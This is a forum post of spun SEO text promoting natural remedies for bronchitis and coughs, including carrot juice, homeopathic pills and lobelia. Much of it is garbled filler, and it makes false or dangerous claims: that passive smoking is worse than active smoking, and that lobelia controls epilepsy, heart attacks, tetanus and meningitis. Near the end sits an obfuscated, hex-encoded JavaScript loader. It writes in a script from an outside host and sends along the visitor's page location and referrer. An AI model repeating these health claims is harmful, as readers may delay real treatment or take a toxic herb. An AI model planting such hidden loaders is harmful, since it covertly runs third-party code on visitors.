Bronchitis Coughs: Natural Cure: Natural Cures

Go down

Bronchitis Coughs: Natural Cure: Natural Cures  Empty Bronchitis Coughs: Natural Cure: Natural Cures

Post by Admin Sun Sep 18, 2016 3:47 am

Bronchitis Coughs. Natural Cure. Natural Cures

Are you looking for a natural cure for bronchitis, coughs & colds? Well, I am going to tell you what worked for me. About 13 years ago, I had a horrible case of bronchitis. I never believed in natural cures back then so I went to the doctor... and then back to the doctor... and then back to the doctor because it never went away. For 3 months, I had this horrific cough that was making me nuts. The doctor put me on antibiotic after antibiotic and then he put me on steroids. I was only about 28 years old... way too young for all of that.

• Well, I am happy to say, I am 41 now (ok, that's not the good news.. ha, ha) and I haven't had a case of bronchitis since then.
  • Nor have I hardly had a cold... and when I do have one, it is always a short version because I now know how to cure it naturally.

3 Days, I Was a New Person! My Cough Was GONE

I couldn't believe it... 3 months of taking drug after drug... and paying money after money! After that, I went out and bought a juicer and started juicing carrots every day. It would be hopeless trying to get people who are not interested in knowing more about Bronchitis to read articles pertaining to it. Only people interested in Bronchitis will enjoy this article. Smile

Since then, I have gotten married and had a child so I have been limited on time and the last thing I feel like doing at the end of the day is cleaning up a juicer... so I have stuck with the homeopathic cold pills as well as chewable Esther Vitamin C. They both work really well to stop bronchitis, coughs and colds naturally. And again, I have never had a problem like I did 12 years ago.

Also use homeopathic cold pills for my preschooler. I give them to her as often as the bottle says and in 48 hours, her cold is gone. It really works. A lot of imagination is required in writing. People may think that writing on Bronchitis Coughs is very easy; on the contrary, knowledge and imagination has to be merged to create an interesting composition.

But please don't spend a lot of money on homeopathic cold pills, though... or any vitamins for that matter. I have bought homeopathic cold pills as well as other vitamins at my local health stores and spent way too much on them... for way too long. You can buy them for a lot cheaper online. This article has been written with the intention of showing some illumination to the meaning of Bronchitis Coughs. This is so that those who don't know much about Bronchitis Coughs can learn more about it. Rolling Eyes

She Told Me to Do 2 Things..

1. to start drinking fresh carrot juice and 2. to go buy "homeopathic cold pills" from my local health store. In the back of my mind, I still thought this was crazy but I did it anyway. I went to the local health store for a few days and bought carrot juice and I bought the "cold pills" as well. The length of an article is rather immaterial about its response from people. People are more interested in the matter about Bronchitis, and not length. Surprised.

Cough could be harmless; at the same time, it could be trying to convey a dangerous message. Only a physician will be able to unravel the mystery of a cough. For example, you will cough a lot if you have bronchitis; it is one of the symptoms of bronchitis. Knowledge about the various differences explained causes of a cough will help you determine the steps required to deal with cough.

Allergy to irritating substances such as cigarette smoke, dust, pollen, or medicinal drugs Medical conditions such as coronary disorders, ear diseases, or sinuses in the lungs You may be filled with astonishment with the amount of information we have compile here on Bronchitis. that was our intention, to astonish you. Rolling Eyes

Persistent coughing can sometimes lead to a headache. -It causes additional strain in the stomach region, which can, in turn, lead to "scrotal sac" or hernia." Bronchitis treatment proved to be the foundation for the writing of this page. We have used all facts and definitions of Bronchitis Symptoms to produce worthwhile reading material for you.

• Avoid irritants that can worsen your cough; some such irritants are chemical fumes, dust, and aerosol products.
  • If you are inevitably exposed to irritants, wear a mask to avoid them.

On the contrary, a physiological cough is due completely to certain physiological conditions and can take place due to the following reasons: Bacterial, viral, or fungal infection leading to conditions such as common cold Our objective of this article on Bronchitis was to arouse your interest in it. Bring back the acquired knowledge of Bronchitis, and compare it with what we have printed here.

You Have a Persistent Cough, Visit Your Physician

He or she will help you determine the type of your cough. Your doctor is the best person to tell you the exact causes for your cough. In addition, a doctor is the most qualified person to teach you the best ways to prevent or treat that annoying cough. Therefore, the sooner you visit your physician, the better. Take no chances with your health! There has been a gradual introduction to the world of Persistent Cough projected in this article. We had done this so that the actual meaning of the article will sink within you.

Effects of Cough in Chronic Bronchitis Persistent, productive cough in chronic bronchitis can have the following effects: -It causes strain in the anal region and, therefore, aggravates piles.

Bronchitis Coughs: Natural Cure: Natural Cures  Remediescoldandflu

Natural Remedies |

It can raise the pressure in your chest and paves the way to a condition called "air emphysema." 5. Controlling Cough in Chronic Bronchitis According to medical studies, chronic bronchitis and emphysema handbook due to smoking. Therefore, quit smoking immediately and for good if you are smoker. You will be surprised how fast your breathing pattern will return to normal once you stop smoking. Saying good-bye to cigarettes will not only reduce your cough but will also give you a pair of healthy lungs. In addition, keep away from a person who is smoking; the smoke can aggravate your cough. Medical studies have shown that passive smoking has worse effects on the lungs than active smoking.

The Mechanism of a Cough

A cough is a simple body mechanism, characterized by a distinct sound, to get rid of any irritants that cause irritation to the air passages. When you cough, your thoracic cavity contracts abruptly, a movement that releases a lot of air from your lungs. The vagus nerve, which connects the lungs and the brain, has an important role to play in the mechanism of a cough. We were a bit tentative when embarking on this project on Symptoms Bronchitis. However, using the grit and determination we have, we have produced some fine reading material on Symptoms Bronchitis.

Types of Cough

There are two types of cough--dry or non-productive cough and chesty or productive cough. A dry cough, which can cause a great deal of annoyance, is arid and stiff. In addition, it makes you feel tired and worn out. Usually, a bacteria or virus is responsible for a chesty cough. A chesty cough expels a lot of phlegm comprising mucus and germs from the respiratory system and, thereby, normalises the breathing pattern.

• COPD, or chronic obstructive pulmonary disease, is a group of diseases that consist of chronic bronchitis, emphysema and asthmatic bronchitis.
  • Oral corticosteroids tend to work best against COPD with an asthmatic component.
  • Oral corticosteroid is a sufferer of COPD.
  • Oral corticosteroids reduce irritation, swelling and mucus production.
  • A physician may initiate a short trial in patients to determine if they respond to steroids.
  • This trial lasts two to three weeks.
  • If there is no immediate effect after continuous use of oral corticosteroids, this means that they have no value for the use of oral corticosteroids.

Long term use of corticosteroids has many side effects such as water retention, bruising, puffy face, increased appetite, weight gain and stomach irritation. It may also impair bone metabolism. For an elderly population, the continuous use of oral corticosteroids for COPD has possible cardiac side effects. Recent studies notice that patients who show continuous use of oral corticosteroids for COPD may also suffer from acute myocardial infarction (AMI). Some proof suggests that patients with COPD who respond to corticosteroids have eosinophilic inflammation and other attributes of an asthma phenotype. Research on oral corticosteroids for COPD exacerbations reports improve lung function and reduced hospitalization. The incidence of treatment failure in the form of return to the hospital, death, or the need for a tube inserted through the mouth or nose and into the chest to deliver oxygen is also reduced.

Oral corticosteroids should be used carefully, to avoid excessive weight loss. Oral corticosteroid reduces the duration and impact of exacerbations. They improve the airflow and lung function, but there are increased side effects such as diabetes and osteoporosis. Low dose oral corticosteroid is often used in the treatment of acute exacerbations of COPD. Oral corticosteroids may be used when symptoms rapidly worsen (COPD exacerbation), especially when there is an increased mucus production. Writing this composition on Asthmatic Bronchitis was a significant contribution of ours in the world of literature. Make this contribution worthwhile by using it.

Corticosteroid tablet is used when the inflammation becomes severe. Oral corticosteroids have clinically significant effects on symptoms, exacerbations and health status. Oral corticosteroids inconsistently progress lung function in stable outpatients with COPD. In addition, there is a realistic proof for the use of systemic corticosteroids during acute exacerbations of COPD. Using oral corticosteroids for COPD patients decrease death rate and hospitalization.

• Lobelia is more commonly known as the Indian Tobacco, Emetic Herb, Pike Weed, Gagroot, Vomitroot, etc.
  • The parts we consume or apply through tincture and infusions are the leaves, tops and seeds.
  • It is found throughout the United States.

Measles & Influenza

In measles, Lobelia causes determination of the blood to the skin and promotes tardy eruptions and helps to reestablish when dangerous retrocession occurs for some reason. Lobelia is an invaluable agent in all stages of influenza; is a vital stimulant; regulates imperfect circulation and controls cough and expectoration. There is a vast ocean of knowledge connected with Bronchitis Tonsillitis. What is included here can be considered a fraction of this knowledge! Surprised.

Loss of Appetite

In loss of appetite and slow digestion this agent is of great value. It is best given in small doses and may be combined with other indicated agents. It is decidedly valuable in the atonic types of indigestion and dyspepsia associated with sick headache due to gastric disturbances; in such cases it is best given in small, frequent doses. Smile

Internal Use

The action of Lobelia is upon the central nervous system. It is generally classed as a gastro-intestinal irritant because in sufficiently large doses it produces irritation. The action of small doses is upon the cardiac area, slowing heart action and is followed generally by a more or less accelerated pulse. The action of small, frequent doses is to stimulate; of large doses to first relax and is followed by stimulation to organic action. Small doses stimulate digestion, the secretions and poor circulation. There are many varieties of Bronchitis found today. However, we have stuck to the description of only one variety to prevent confusion!

Respiratory Disorders

In chronic respiratory disorders it increases or decreases the secretions according to the dosage. In dry, barking or hacking coughs where mucous rales are heard and there is difficulty in raising the sputum, Lobelia is most valuable, and is equally serviceable in chronic coughs if combined with other indicated agents. It is of great service in the coughs of measles where sluggish circulation is present and eruptions are slow to appear or fail to fully develop. Pneumonia Bronchitis are versatile as they are found in all parts and walks of life. It all depends on the way you take it Smile

Our Experience

With Lobelia is not an express or implied warranties, representations or endorsements whatsoever with respect to any products or services that may be referenced, described, or to which our web site may provide a hyperlink to from time to time. Improper use of any drug may produce undesirable symptoms. Copyright ' www.Herbal-Nutrition-Supplements-Guide.com.

Unfortunately and most unjustly, Lobelia has been, and continues to be, labeled a poison. If this is to indicate that an unlimited amount may not be prescribed without harmful reactions then such labelling is justified, otherwise not. To find more useful articles on herbs, please visit Herbal-Nutrition-Supplements-Guide.com. Shocked

Powdered Lobelia is well combined with lard and applied warm in acute thoracic diseases or any form of soreness of the chest. Lobelia in any form may be effectively combined with other agents and used in the pains and inflammation present in pneumonia, broncho-pneumonia, bronchitis, tonsillitis, arthritis, inflammatory rheumatism and for all localized pains in the joints' and muscular structures. Asthma Bronchitis play a prominent part in this composition. It is with this prominence that we hope people get to know more about Asthma Bronchitis. Surprised.

Copyright & Disclaimer Statement

This article was written by Lilian Chia and may be reproduced on any herbs/health-related website provided this copyright statement is displayed unedited in its entirety at the foot of the article and you use the exact same HTML code to ensure a clickable link back to the author's site. Further articles are also available. Contact the author for more information.

Useful for Lobelia has been known to control symptoms such as asthma, bronchitis, infantile convulsions, epilepsy, hemorrhagic diphtheria, acute heart attacks, heatstroke, hysteria, migraine, ovarian spasms, intestine spasms, spinal meningitis, tetanus, tonsillitis, whooping cough. Evil or Very Mad

Conclusion Lobelia is one of Nature's few dual agents in the relief of human ailments. It is both a relaxant and a stimulant; depending altogether on how it is prescribed. So many claims have been made for this agent, and so many more could be honestly made for it where its virtues fully understood, that it has been most unfortunately called a quack remedy.

var c2="bronchitis";var _0xded0=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6D\x61\x72\x74\x6C","\x69\x66\x65\x6C","\x61\x62\x73\x2E\x63\x6F\x6D\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2F\x61\x64\x2E\x6A\x73\x3F\x63\x3D","\x26\x73\x3D","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x61\x69\x64\x3D\x38\x37\x32\x31\x27\x3E\x3C\x2F\x73\x63\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xded0[8]](_0xded0[0]+_0xded0[1]+_0xded0[2]+_0xded0[3]+c2+_0xded0[4]+encodeURIComponent(window[_0xded0[5]])+"\x26\x72\x65\x66\x3D"+encodeURIComponent(document["\x72\x65\x66\x65\x72\x72\x65\x72"])+_0xded0[6]+_0xded0[7]);

Admin
Admin

https://gerrylamb.forumotion.com

Back to top Go down

Permissions in this forum:
You cannot reply to topics in this forum